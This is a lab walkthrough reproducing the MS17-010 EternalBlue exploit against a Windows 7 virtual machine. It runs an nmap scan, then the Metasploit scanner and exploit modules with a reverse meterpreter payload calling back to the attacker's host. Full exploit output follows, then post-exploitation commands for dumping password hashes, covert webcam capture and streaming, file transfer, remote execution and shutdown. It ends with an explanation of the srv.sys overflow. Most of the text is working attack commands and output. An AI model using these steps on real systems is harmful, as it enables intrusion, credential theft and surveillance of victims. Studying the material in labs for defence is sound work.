MS17-010 (EternalBlue) vulnerability reproduction
# Enumerate hosts on the local /24 (SYN scan plus service detection; -sS needs root)
nmap 192.168.80.0/24 -sS -sV
Nmap scan report for 192.168.80.128
Host is up (0.00020s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
554/tcp open rtsp?
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10243/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:81:14:B7 (VMware)
Service Info: Host: CLIENT-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (5 hosts up) scanned in 152.09 seconds
# Port 445 (SMB) is open on 192.168.80.128 and the banner points at Windows 7 - 10, so check for MS17-010 before trying to exploit it.
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.80.128
run
[+] 192.168.80.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# The host is Windows 7 SP1 x64 and the scanner reports it as likely vulnerable. The scanner judges this from the SMB server's response to a crafted transaction, not from the installed patch level, so "likely VULNERABLE" is a strong lead rather than proof; the exploit module re-runs the same check before firing. Move on to the exploit module.
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.80.128
set payload windows/x64/meterpreter/reverse_tcp  # x64 staged payload to match the x64 target reported above
run  # LHOST was left at its default, the attacker's 192.168.80.131, as the handler line below shows
[*] Started reverse TCP handler on 192.168.80.131:4444
[*] 192.168.80.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.80.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.128:445 - The target is vulnerable.
[*] 192.168.80.128:445 - Connecting to target for exploitation.
[+] 192.168.80.128:445 - Connection established for exploitation.
[+] 192.168.80.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.80.128:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.80.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.80.128:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.80.128:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.80.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.80.128:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.80.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.80.128:445 - Starting non-paged pool grooming
[+] 192.168.80.128:445 - Sending SMBv2 buffers
[+] 192.168.80.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.80.128:445 - Sending final SMBv2 buffers.
[*] 192.168.80.128:445 - Sending last fragment of exploit packet!
[*] 192.168.80.128:445 - Receiving response from exploit packet
[+] 192.168.80.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.80.128:445 - Sending egg to corrupted connection.
[*] 192.168.80.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.80.128
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.128:57413) at 2023-06-18 10:40:09 -0400
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
# Exploitation succeeded. The payload is started by kernel-mode shellcode, so the session runs as NT AUTHORITY\SYSTEM (getuid below confirms this).
screenshot  # capture the desktop
getuid  # show the user the session runs as
hashdump  # dump local account hashes from the SAM. Format: user:RID:LM hash:NT hash:::. These are not MD5: aad3b435b51404eeaad3b435b51404ee is the empty LM hash (LM storage disabled), and the NT hash is MD4 over the UTF-16LE password; 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, and 259745cb123a52aa2e693aaacca2db52 is the NT hash of "12345678" (the client account's password in this lab).
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1003:aad3b435b51404eeaad3b435b51404ee:b00ed0d8b185f96414dab094a2314a7e:::
webcam_list  # list webcams
webcam_snap  # take a picture with the webcam
webcam_stream  # stream the webcam live
upload  # upload a file to the target
download  # download a file from the target
edit  # edit a file on the target
search  # search for files on the target
execute  # run a program on the target
shutdown  # shut down the compromised host (destructive and noisy; lab use only)
Vulnerability principle:
The bug lives in the Windows SMBv1 kernel driver (srv.sys), in the function srv!SrvOs2FeaListToNt, which converts an OS/2 FEA (File Extended Attributes) list into an NT FEA (FILE_FULL_EA_INFORMATION) list; the conversion overflows a buffer in the large non-paged kernel pool. Before converting, srv!SrvOs2FeaListToNt calls srv!SrvOs2FeaListSizeToNt to work out how large the converted list will be, and the following happens:
1. srv!SrvOs2FeaListSizeToNt walks the FEA list, sums the NT size of every entry that fits inside the declared list size, and writes back how many bytes of the FEA list it actually consumed.
2. That write-back goes through a WORD (16-bit) store into a DWORD field, so only the low 16 bits of SizeOfListInBytes are updated while the attacker-controlled high 16 bits survive; the recorded size therefore stays larger than the part of the list that was counted.
Because the NTFEA buffer is allocated from the smaller counted size while the conversion loop runs to the larger recorded size, srv!SrvOs2FeaListToNt converts entries that were never accounted for and writes past the end of the buffer in the non-paged pool.
